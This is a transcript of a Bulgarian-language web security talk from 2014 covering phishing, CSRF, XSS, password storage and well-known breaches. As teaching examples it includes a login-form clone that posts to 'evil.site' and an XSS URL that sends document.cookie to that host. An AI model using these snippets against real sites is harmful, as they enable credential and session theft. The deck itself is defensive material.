Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Security

Web Security

Georgy Angelov

March 28, 2014
Tweet

More Decks by Georgy Angelov

Other Decks in Programming

Transcript

 1. Web Security

  View Slide

 2. DISCLAIMER

  View Slide

 3. Имам ~130 слайда

  View Slide

 4. Няма да покрия темата и на 10%

  View Slide

 5. Ще говоря и за неща, които по
  принцип са ясни и логични, но
  се оказва, че доста често ги
  пропускаме.

  View Slide

 6. Ще започна с по-простите

  View Slide

 7. Може да отегча някои от Вас

  View Slide

 8. Да започваме?

  View Slide

 9. Security?

  View Slide

 10. Из речника
  • Сигурност, безопасност, спокойствие
  • Увереност, доверие
  • Защита, охрана
  • Гаранция

  View Slide

 11. Из речника
  • Сигурност, безопасност, спокойствие
  • Увереност, доверие
  • Защита, охрана
  • Гаранция

  View Slide

 12. Кое защитаваме?

  View Slide

 13. Информацията?

  View Slide

 14. Хората, които я използват!

  View Slide

 15. Защо?

  View Slide

 16. Доверие

  View Slide

 17. Пари

  View Slide

 18. План
  • Attack vectors
  • Пароли
  • Съвети
  • Стената на срама

  View Slide

 19. Attack vectors

  View Slide

 20. An attack vector is a path or means by which a hacker (or cracker) can
  gain access to a computer or website in order to deliver a payload or
  malicious outcome. Attack vectors enable hackers to exploit system
  vulnerabilities, including the human element.

  View Slide

 21. Phishing

  View Slide

 22. Phishing
  • Подобни домейни
  • Email spoofing
  • Маскиране на линкове

  View Slide

 23. http://gmail.com/
  Къде води този линк?

  View Slide

 24. http://gmail.com

  View Slide

 25. http://gmail.com
  $('.evil').on('click', function(e) {
  window.location = "http://evil.site/";
  e.preventDefault();
  });

  View Slide

 26. Дублиране на страници
  $.get(‘http://website.com/login’, function(html) {
  $(‘body’).append(html);
  $(‘form’).attr(‘action’, ‘http://evil.site/login’);
  });

  View Slide

 27. Дублиране на страници
  $.get(‘http://website.com/login’, function(html) {
  $(‘body’).append(html);
  $(‘form’).attr(‘action’, ‘http://evil.site/login’);
  });
  Това точно няма да сработи заради Access Control Origin, но ако сървъра зареди html-a всичко ще е наред.

  View Slide

 28. За съжаление не можем да направим
  много, ...

  View Slide

 29. освен да използваме HTTPS и да
  насърчаваме потребителите да гледат URL-a.

  View Slide

 30. Cross-Site Request Forgery

  View Slide

 31. Да изтрием акаунта му
  Free icecream

  View Slide

 32. Ще кажете “ама не трябва да е GET”  $(‘form’).submit();

  View Slide

 33. Какво можем да направим?

  View Slide

 34. Synchronizer Token Pattern
  (CSRF Token)

  View Slide

 35. Уникален, генериран ключ за всяко
  показване на формата.

  View Slide

 36. Пази се като част от сесията и се валидира
  при submit.

  View Slide

 37. Идва като вградена функционалност с
  доста framework-ове.

  View Slide

 38. Cross Site Scripting (XSS)

  View Slide

 39. Най-често използваната атака.
  ~40% от всички атаки

  View Slide

 40. Приложимо, когато на страницата се
  показва нефилтриран текст
  (взет от потребител като параметър).

  View Slide

 41. Три вида XSS

  View Slide

 42. Non-persistent XSS

  View Slide

 43. Non-persistent XSS
  http://site.com/result?error=No%20such%20user
  http://site.com/result?error=$.get(‘http://evil.site/?c=‘+<br/>document.cookie);

  View Slide

 44. Persistent XSS

  View Slide

 45. Persistent XSS
  1. Събмитваме текст в някое поле, съдържащ въпросния скрипт.
  2. Потребител отваря профила ни.
  3. Открадваме сесията му.
  4. Логваме се с нея.
  5. WIN

  View Slide

 46. Доста по-рядко срещано,
  но и много по-опасно.

  View Slide

 47. View Slide

 48. https://blog.twitter.com/2010/all-about-onmouseover-incident

  View Slide

 49. View Slide

 50. http://threatpost.com/paypal-site-vulnerable-to-xss-attack/100787

  View Slide

 51. View Slide

 52. Какво да не правим?

  View Slide


 53. В ERB, EJS и някои други това е ОК, защото самия темплейт енджин кодира HTML знаците в текста.

  View Slide

 54. <br/>var initData = <%= data.to_json %>;<br/>// …<br/>

  View Slide

 55. <br/>var initData = {<br/>“text”: “alert(document.cookie);”
  };
  // …

  View Slide

 56. DOM-based XSS

  View Slide

 57. Често при RIA сайтове

  View Slide

 58. Разчита на подобни проблеми,
  но на клиента

  View Slide

 59. DOM-based XSS
  var page = window.location.hash.replace(“page=“, “”);
  $(‘Page ‘ + page + ’’).appendTo(…);

  View Slide

 60. DOM-based XSS
  http://site.com/#page=3
  http://site.com/#page=...

  View Slide

 61. Решението е лесно и ясно
  &  &
  <  <
  >  >
  "  "
  '  '
  /  /

  View Slide

 62. Докато не забравим
  да го приложим някъде…

  View Slide

 63. ...или го дадем на някой плъгин,
  който не го прави.

  View Slide

 64. HTTP only cookies

  View Slide

 65. Information leakage

  View Slide

 66. View Slide

 67. View Slide

 68. Това е втората най-често използвана атака

  View Slide

 69. Man-In-The-Middle attack

  View Slide

 70. View Slide

 71. Wi-Fi packet sniffing
  (подушване на пакети)

  View Slide

 72. Не, кучето Ви не може да подуши тези
  пакети

  View Slide

 73. Четене на некриптиран трафик
  от и до публичен hotspot.
  Включително пароли.

  View Slide

 74. HTTPS

  View Slide

 75. Пароли

  View Slide

 76. Най-важното нещо,
  след номерата на банкови карти

  View Slide

 77. Защо точно паролите?

  View Slide

 78. Потребителите са глупави...
  (аз включително)

  View Slide

 79. ...преизползват пароли

  View Slide

 80. “Passwords are never stored in plaintext. At
  least they shouldn't be, unless you're
  building the world's most insecure system
  using the world's most naive programmers.”
  - случаен човек в нета

  View Slide

 81. protected String encodePassword(String password) {
  String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1";
  StringBuilder result = new StringBuilder();
  for (int i = 0; i < password.length(); i ++) {
  result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1));
  }
  return result.toString();
  }

  View Slide

 82. protected String decodePassword(String password) {
  String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1";
  ref = new StringBuilder(ref).reverse().toString();
  StringBuilder result = new StringBuilder();
  for (int i = 0; i < password.length(); i ++) {
  result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1));
  }
  return result.toString();
  }
  Java

  View Slide

 83. conseq([X,Y|L], X, Y).
  conseq([_|L], X, Y) :- conseq(L, X, Y).
  mapNext(Code, [], []).
  mapNext(Code, [X|L], [Y|LRes]) :- conseq(Code, X, Y), mapNext(Code, L, LRes).
  ?- string_codes(' 1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1 ', Code),
  string_codes('123', L),
  mapNext(Code, L, X),
  write(X).
  Prolog

  View Slide

 84. Whitespace

  View Slide

 85. Security through obscurity

  View Slide

 86. View Slide

 87. Няма полза от това да си грозен

  View Slide

 88. Хешове

  View Slide

 89. Защита дори ако “изтече” базата от данни

  View Slide

 90. MD5? SHA1? SHA256?

  View Slide

 91. На един по-мощен настолен компютър
  • MD5 – 8 000 000 000 пароли в секунда
  • SHA1 – 3 000 000 000 пароли в секунда
  • SHA256 – 1 100 000 000 пароли в секунда

  View Slide

 92. 8-символна парола от букви, цифри и
  някои специални знаци
  се краква за ~ 10 часа.

  View Slide

 93. По-бързо ако използваме rainbow таблица

  View Slide

 94. Или пък я има в някой речник

  View Slide

 95. Или си пуснете няколко големи
  Amazon EC2 GPU машини
  http://du.nham.ca/blog/posts/2013/03/08/password-cracking-on-amazon-ec2/
  https://www.cloudcracker.com

  View Slide

 96. Трябва ни нещо по-добро

  View Slide

 97. Хеш със сол

  View Slide

 98. Уникална за конкретната парола добавка,
  която я “разширява”.

  View Slide

 99. Прави хеша уникален,
  дори да има еднакви пароли

  View Slide

 100. Обезсмисля rainbow таблиците и
  забавя едновременни brute-force
  атаки на много пароли

  View Slide

 101. Малко е!

  View Slide

 102. Решението?

  View Slide

 103. BCrypt, PBKDF2, SCrypt

  View Slide

 104. Осоляват и хешират много пъти

  View Slide

 105. Параметризират “бавността” на хеширане
  => осъкатяват brute-force-a

  View Slide

 106. Стената на срама

  View Slide

 107. View Slide

 108. 03.10.2013 - компрометирани 150 000 000 акаунта
  http://helpx.adobe.com/x-productkb/policy-pricing/customer-alert.html
  http://www.theguardian.com/technology/2013/nov/07/adobe-password-leak-can-check

  View Slide

 109. View Slide

 110. http://us.blizzard.com/en-us/securityupdate.html

  View Slide

 111. View Slide

 112. 8 000 000 SHA1 хешове без сол
  http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/
  http://arstechnica.com/security/2012/06/8-million-leaked-passwords-connected-to-linkedin/

  View Slide

 113. View Slide

 114. Не е fail, но все пак – brute-force от 40 000 различни IP адреса.
  https://github.com/blog/1698-weak-passwords-brute-forced

  View Slide

 115. View Slide

 116. Ubuntu forums - 1 820 000 потребителски акаунти
  http://www.zdnet.com/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen-7000018336/

  View Slide

 117. Random съвети

  View Slide

 118. При неуспешен логин не казвайте кое е
  грешно – мейла или паролата.

  View Slide

 119. Потвърждавайте промяната на мейл
  адреса и на стария мейл.

  View Slide

 120. Защитавайте и backup сървърите

  View Slide

 121. Блокирайте login формата
  при определен брой неуспешни опити,
  или показвайте captcha

  View Slide

 122. Обновявайте си ОС-а на сървърите и
  developer-ските машини

  View Slide

 123. View Slide

 124. Застрашени всички потребители на iOS, MacOS
  http://www.cnet.com/news/apple-finally-fixes-gotofail-os-x-security-hole/

  View Slide

 125. View Slide

 126. View Slide

 127. Застрашени (почти) всички потребители на Linux
  http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping/
  https://www.gitorious.org/gnutls/gnutls/commit/6aa26f78150ccbdf0aec1878a41c17c41d358a3b

  View Slide

 128. Windows is next

  View Slide

 129. View Slide

 130. http://arstechnica.com/security/2013/10/hack-of-mongohq-exposes-passwords-user-databases-to-intruders/

  View Slide

 131. View Slide

 132. Social engineering
  http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/

  View Slide

 133. egov.bg

  View Slide

 134. egov.bg
  /document?eDocId=base64()
  http://blog.bozho.net/?p=1327

  View Slide

 135. И най-добрият съвет...

  View Slide

 136. Use it!

  View Slide

 137. Благодаря за вниманието!

  View Slide

 138. Благодаря за вниманието!
  Разбрах, че котките помагали в презентации.

  View Slide